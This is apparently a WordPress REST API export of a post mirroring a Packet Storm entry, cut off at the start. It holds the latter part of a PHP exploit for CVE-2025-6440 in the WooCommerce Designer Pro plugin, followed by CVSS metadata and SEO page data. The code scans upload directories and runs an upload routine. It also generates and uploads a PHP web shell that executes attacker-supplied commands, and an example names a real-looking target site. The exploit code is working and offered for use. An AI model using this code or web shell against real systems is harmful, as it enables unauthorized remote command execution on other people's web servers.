{\\n            echo \\&#8221;\\\\n[*] Scanning uploads directory structure&#8230;\\\\n\\&#8221;;\\n            \\n            $base_uploads = $this-\\u003ebase_url . \\&#8221;wp-content\/uploads\/\\&#8221;;\\n            $wcdp_uploads = $base_uploads . \\&#8221;wcdp-uploads\/\\&#8221;;\\n            \\n            echo \\&#8221;[*] Base uploads: $base_uploads\\\\n\\&#8221;;\\n            echo \\&#8221;[*] WCDP uploads: $wcdp_uploads\\\\n\\&#8221;;\\n            \\n            \/\/ \u0641\u062d\u0635 \u0627\u0644\u0645\u0633\u0627\u0631\u0627\u062a\\n            $paths_to_check = [\\n                $base_uploads,\\n                $wcdp_uploads,\\n                $wcdp_uploads . \\&#8221;temp\/\\&#8221;,\\n                $wcdp_uploads . \\&#8221;designs\/\\&#8221;,\\n                $wcdp_uploads . \\&#8221;images\/\\&#8221;\\n            ];\\n            \\n            foreach ($paths_to_check as $path) {\\n                $ch = curl_init($path);\\n                curl_setopt_array($ch, [\\n                    CURLOPT_RETURNTRANSFER =\\u003e true,\\n                    CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n                    CURLOPT_NOBODY =\\u003e true,\\n                    CURLOPT_TIMEOUT =\\u003e 5\\n                ]);\\n                \\n                curl_exec($ch);\\n                $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n                curl_close($ch);\\n                \\n                echo \\&#8221;[*] $path -\\u003e HTTP $code\\\\n\\&#8221;;\\n                \\n                \/\/ \u0625\u0630\u0627 \u0643\u0627\u0646 \u0627\u0644\u062f\u0644\u064a\u0644 \u0645\u0648\u062c\u0648\u062f\u060c \u062d\u0627\u0648\u0644 \u0633\u0631\u062f \u0627\u0644\u0645\u0644\u0641\u0627\u062a\\n                if ($code == 200 || $code == 403) {\\n                    $ch = curl_init($path);\\n                    curl_setopt_array($ch, [\\n                        CURLOPT_RETURNTRANSFER =\\u003e true,\\n                        CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n                        CURLOPT_TIMEOUT =\\u003e 5\\n                    ]);\\n                    \\n                    $html = curl_exec($ch);\\n                    curl_close($ch);\\n                    \\n                    \/\/ \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0645\u0644\u0641\u0627\u062a\\n                    if (preg_match_all(&#8216;\/\\u003ca\\\\s+href=\\&#8221;([^\\&#8221;]+\\\\.(php|png|jpg|jpeg|gif))\\&#8221;\/i&#8217;, $html, $matches)) {\\n                        echo \\&#8221;  Found files:\\\\n\\&#8221;;\\n                        foreach ($matches[1] as $file) {\\n                            echo \\&#8221;    &#8211; $file\\\\n\\&#8221;;\\n                        }\\n                    }\\n                }\\n            }\\n        }\\n    }\\n    \\n    \/\/ \u0627\u0644\u062a\u0646\u0641\u064a\u0630\\n    if (php_sapi_name() === &#8216;cli&#8217;) {\\n        $options = getopt(\\&#8221;u:f:vd\\&#8221;, [\\&#8221;url:\\&#8221;, \\&#8221;file:\\&#8221;, \\&#8221;verbose\\&#8221;, \\&#8221;dirscan\\&#8221;]);\\n        \\n        if (!isset($options[&#8216;url&#8217;])) {\\n            echo \\&#8221;Usage: php \\&#8221; . basename(__FILE__) . \\&#8221; &#8211;url=\\u003ctarget\\u003e [&#8211;file=\\u003cpayload\\u003e] [&#8211;verbose] [&#8211;dirscan]\\\\n\\&#8221;;\\n            echo \\&#8221;Example: php \\&#8221; . basename(__FILE__) . \\&#8221; &#8211;url=https:\/\/bezignprint.com &#8211;file=shell.php &#8211;verbose\\\\n\\&#8221;;\\n            echo \\&#8221;         php \\&#8221; . basename(__FILE__) . \\&#8221; &#8211;url=https:\/\/bezignprint.com &#8211;dirscan\\\\n\\&#8221;;\\n            exit(1);\\n        }\\n        \\n        $url = $options[&#8216;url&#8217;] ?? &#8221;;\\n        $verbose = isset($options[&#8216;verbose&#8217;]);\\n        $dirscan = isset($options[&#8216;dirscan&#8217;]);\\n        \\n        CVE_2025_6440_Exploit::print_banner();\\n        \\n        $exploit = new CVE_2025_6440_Exploit($url, $verbose);\\n        \\n        if ($dirscan) {\\n            $exploit-\\u003edirectory_scan();\\n            exit(0);\\n        }\\n        \\n        if (!isset($options[&#8216;file&#8217;])) {\\n            echo \\&#8221;[!] Payload file required (use &#8211;file=\\u003cpayload\\u003e)\\\\n\\&#8221;;\\n            \\n            \/\/ \u0625\u0646\u0634\u0627\u0621 payload \u0627\u0641\u062a\u0631\u0627\u0636\u064a\\n            $default_payload = \\&#8221;shell.php\\&#8221;;\\n            if (!file_exists($default_payload)) {\\n                $shell_code = &#8216;\\u003c?php \\n    if(isset($_GET[\\&#8221;cmd\\&#8221;])) {\\n        system($_GET[\\&#8221;cmd\\&#8221;]);\\n    } elseif(isset($_POST[\\&#8221;cmd\\&#8221;])) {\\n        system($_POST[\\&#8221;cmd\\&#8221;]);\\n    } else {\\n        echo \\&#8221;Shell Active &#8211; \\&#8221; . php_uname() . \\&#8221;\\\\n\\&#8221;;\\n        echo \\&#8221;Usage: ?cmd=id or POST cmd=id\\&#8221;;\\n    }\\n    ?\\u003e&#8217;;\\n                file_put_contents($default_payload, $shell_code);\\n                echo \\&#8221;[*] Created default payload: $default_payload\\\\n\\&#8221;;\\n                $options[&#8216;file&#8217;] = $default_payload;\\n            } else {\\n                echo \\&#8221;[*] Using existing payload: $default_payload\\\\n\\&#8221;;\\n                $options[&#8216;file&#8217;] = $default_payload;\\n            }\\n        }\\n        \\n        $file = $options[&#8216;file&#8217;] ?? &#8221;;\\n        $exploit-\\u003eexploit($file);\\n    }\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/215066&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/215066\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-06T18:47:18&#8243;,&#8221;description&#8221;:&#8221;WordPress WOOCOMMERCE Designer Pro plugin version 1.9.26 proof of concept remote shell upload exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-06T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-06T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 WordPress WOOCOMMERCE Designer Pro 1.9.26 Shell Upload&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215066&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-6440&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n | # Title :&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-39478","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 WordPress WOOCOMMERCE Designer Pro 1.9.26 Shell Upload_PACKETSTORM:215066 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=39478\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 WordPress WOOCOMMERCE Designer Pro 1.9.26 Shell Upload_PACKETSTORM:215066 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-06T18:47:18&#8243;,&#8221;description&#8221;:&#8221;WordPress WOOCOMMERCE Designer Pro plugin version 1.9.26 proof of concept remote shell upload exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-06T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-06T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 WordPress WOOCOMMERCE Designer Pro 1.9.26 Shell Upload&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215066&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-6440&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title :...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=39478\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-06T13:53:23+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"15 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39478#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39478\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 WordPress WOOCOMMERCE Designer Pro 1.9.26 Shell Upload_PACKETSTORM:215066\",\"datePublished\":\"2026-02-06T13:53:23+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39478\"},\"wordCount\":2957,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39478#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39478\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39478\",\"name\":\"\ud83d\udcc4 WordPress WOOCOMMERCE Designer Pro 1.9.26 Shell Upload_PACKETSTORM:215066 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-06T13:53:23+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39478#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39478\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39478#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 WordPress WOOCOMMERCE Designer Pro 1.9.26 Shell Upload_PACKETSTORM:215066\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 WordPress WOOCOMMERCE Designer Pro 1.9.26 Shell Upload_PACKETSTORM:215066 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=39478","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 WordPress WOOCOMMERCE Designer Pro 1.9.26 Shell Upload_PACKETSTORM:215066 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-06T18:47:18&#8243;,&#8221;description&#8221;:&#8221;WordPress WOOCOMMERCE Designer Pro plugin version 1.9.26 proof of concept remote shell upload exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-06T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-06T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 WordPress WOOCOMMERCE Designer Pro 1.9.26 Shell Upload&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215066&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-6440&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title :...","og_url":"https:\/\/zero.redgem.net\/?p=39478","og_site_name":"zero redgem","article_published_time":"2026-02-06T13:53:23+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"15 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=39478#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=39478"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 WordPress WOOCOMMERCE Designer Pro 1.9.26 Shell Upload_PACKETSTORM:215066","datePublished":"2026-02-06T13:53:23+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=39478"},"wordCount":2957,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=39478#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=39478","url":"https:\/\/zero.redgem.net\/?p=39478","name":"\ud83d\udcc4 WordPress WOOCOMMERCE Designer Pro 1.9.26 Shell Upload_PACKETSTORM:215066 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-06T13:53:23+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=39478#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=39478"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=39478#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 WordPress WOOCOMMERCE Designer Pro 1.9.26 Shell Upload_PACKETSTORM:215066"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39478","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=39478"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39478\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=39478"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=39478"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=39478"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}